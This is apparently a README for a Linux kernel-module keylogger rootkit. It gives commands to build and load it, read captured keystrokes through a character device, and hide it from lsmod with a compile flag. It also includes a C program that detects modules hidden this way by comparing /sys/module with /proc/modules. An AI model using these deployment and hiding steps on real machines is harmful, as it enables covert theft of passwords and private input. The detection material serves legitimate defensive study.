A stealthy Linux kernel-based keylogger that hides itself from lsmod and
/proc/modules.
This rootkit is in the form of a loadable kernel module. It receives keyboard
events from the kernel, stores them in a buffer and exposes them through a
character device; reading that device returns the captured keystrokes. Loading
the module, creating the device node and reading from it all require root. The
major number is assigned dynamically when the module registers its device, so
take it from the dmesg line rather than assuming it will be 249. Install using
insmod:
$ insmod keylog
$ dmesg | tail -n1
[ 498.484687] keylog: Registered device major number 249
$ mknod chrdev0 c 249 0 # create a character device, 249 is the major no.
$ cat chrdev0

Make sure you have linux-headers installed for the running kernel.
$ make

To hide the module from the kernel, compile with -DHIDE_MODULE. You can also
change the buffer size BUFLEN that is used to store key events; it holds the
events until something reads the device. By default it is 1024 bytes. Both
defines are passed to kbuild through KCPPFLAGS:

$ KCPPFLAGS="-DHIDE_MODULE -DBUFLEN=2048" make

Note that lsmod and /proc/modules are two views of the same kernel module
list. Unless the module also removes itself from sysfs and from
/proc/kallsyms, /sys/module/keylog and the module's symbols remain visible,
so comparing those sources against /proc/modules is a simple way to detect it.

A Vagrant box with essential tools/packages is provided. Simply run the
following commands to build the box and get a shell in it:
$ vagrant up
$ vagrant ssh
vagrant@stretch:~$ cd /vagrant
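The hiding described above takes the module out of the list that lsmod and /proc/modules read. The userspace program below is an added detection check for this README, not part of the keylog project: it cross-references /sys/module with /proc/modules and reports loadable modules that sysfs knows about but /proc/modules does not. Only loadable modules carry /sys/module/<name>/initstate (built-in modules appear under /sys/module only with their parameters), which is how it tells the two apart. The function names, the constructed /proc/modules sample and the module names in it are this example's own assumptions.

```c
/* hidden_module_check.c: report kernel modules that sysfs knows about but that
 * are missing from /proc/modules (and therefore from lsmod).
 * Added example for this README, not part of the keylog project.
 * Build: cc -Wall -o hidden_module_check hidden_module_check.c
 */
#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

#define MAX_NAME 64
#define MAX_MODS 1024

/* /proc/modules lines look like "name size refcnt deps state addr".
 * Return 1 if `name` is the exact first field of some line in `proc_modules`. */
static int in_proc_modules(const char *proc_modules, const char *name)
{
    size_t n = strlen(name);
    const char *p = proc_modules;

    while (*p) {
        const char *eol = strchr(p, '\n');
        size_t len = eol ? (size_t)(eol - p) : strlen(p);

        /* require the trailing space so "xt" does not match "xt_conntrack" */
        if (len > n && strncmp(p, name, n) == 0 && p[n] == ' ')
            return 1;
        if (!eol)
            break;
        p = eol + 1;
    }
    return 0;
}

/* sysfs_loaded: names of loadable modules according to /sys/module.
 * Copies every name absent from proc_modules into `hidden`; returns the count. */
size_t find_hidden_modules(const char *const *sysfs_loaded, size_t count,
                           const char *proc_modules,
                           char hidden[][MAX_NAME], size_t max_hidden)
{
    size_t found = 0;

    for (size_t i = 0; i < count && found < max_hidden; i++) {
        if (in_proc_modules(proc_modules, sysfs_loaded[i]))
            continue;
        snprintf(hidden[found], MAX_NAME, "%s", sysfs_loaded[i]);
        found++;
    }
    return found;
}

/* Constructed sample (not real system data): three modules known to sysfs,
 * only two of which are listed in /proc/modules. */
size_t check_constructed_sample(char hidden[][MAX_NAME], size_t max_hidden)
{
    static const char proc_modules[] =
        "ext4 737280 2 - Live 0x0000000000000000\n"
        "xt_conntrack 16384 4 - Live 0x0000000000000000\n";
    static const char *const sysfs_loaded[] = { "ext4", "xt_conntrack", "keylog" };

    return find_hidden_modules(sysfs_loaded, 3, proc_modules, hidden, max_hidden);
}

/* Live system: a loadable module has /sys/module/<name>/initstate; built-in
 * modules appear under /sys/module too, but only with their parameters. */
static size_t list_sysfs_loaded(char names[][MAX_NAME], size_t max)
{
    DIR *d = opendir("/sys/module");
    struct dirent *e;
    struct stat st;
    char path[512];
    size_t n = 0;

    if (!d)
        return 0;
    while ((e = readdir(d)) != NULL && n < max) {
        if (e->d_name[0] == '.')
            continue;
        snprintf(path, sizeof path, "/sys/module/%s/initstate", e->d_name);
        if (stat(path, &st) == 0)
            snprintf(names[n++], MAX_NAME, "%s", e->d_name);
    }
    closedir(d);
    return n;
}

int main(void)
{
    static char names[MAX_MODS][MAX_NAME], hidden[MAX_MODS][MAX_NAME];
    static const char *ptrs[MAX_MODS];
    static char proc_modules[1 << 17];
    size_t n = list_sysfs_loaded(names, MAX_MODS), len, h;
    FILE *f = fopen("/proc/modules", "r");

    if (!f) {
        perror("/proc/modules");
        return 1;
    }
    len = fread(proc_modules, 1, sizeof proc_modules - 1, f);
    proc_modules[len] = '\0';
    fclose(f);

    for (size_t i = 0; i < n; i++)
        ptrs[i] = names[i];
    h = find_hidden_modules(ptrs, n, proc_modules, hidden, MAX_MODS);
    for (size_t i = 0; i < h; i++)
        printf("in /sys/module but not /proc/modules: %s\n", hidden[i]);
    return h ? 2 : 0;
}
```

Run it inside the Vagrant box after loading a build made with -DHIDE_MODULE; it exits with status 2 and names the module if the sysfs entry is still present. A module that additionally deletes its sysfs kobject would evade this particular check, in which case /proc/kallsyms is the next source to compare against /proc/modules.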